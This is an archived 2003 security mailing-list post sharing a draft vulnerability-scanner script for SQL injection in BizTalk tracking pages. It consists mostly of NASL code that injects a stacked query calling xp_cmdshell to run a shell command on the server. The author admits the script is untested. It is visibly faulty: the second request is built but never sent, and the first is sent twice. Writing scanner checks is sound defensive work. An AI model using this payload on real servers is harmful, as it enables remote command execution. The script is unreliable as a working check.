more biztalk shtuff

From: John Lampe (j_lampeat_private)
Date: Thu May 15 2003 - 23:05:25 PDT

  • Next message: John Lampe: "Anyone working on Cesar's biztalk bugs"

    And...this is alledgedly what will work for the biztalk sql
    injection....again, no server to test against...
    
    John W. Lampe
    https://f00dikator.aceryder.com/
    
    >
    > port=80;
    > req1 = string("GET
    /biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec");
    > req1 = req1 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0",
    "\r\n\r\n");
    >
    > req2 = string("GET
    /server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection
    =1;exec");
    > req2 = req2 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0",
    "\r\n\r\n");
    >
    > soc = open_sock_tcp(port);
    > if (soc) {
    > q = send(socket:soc, data:req1);
    > r = recv(socket:soc, length:1024);
    > if (  egrep(pattern:".*Directory*" , string:r) )
    {security_hole(port:port); }
    > close(soc);
    > }
    >
    > soc2 = open_sock_tcp(port);
    > if (soc2) {
    >         q = send(socket:soc2, data:req1);
    >         r = recv(socket:soc2, length:1024);
    >         if (  egrep(pattern:".*Directory*" , string:r) )
    {security_hole(port:port); }
    >         close(soc2);
    > }
    >
    



    This archive was generated by hypermail 2b30 : Thu May 15 2003 - 21:57:53 PDT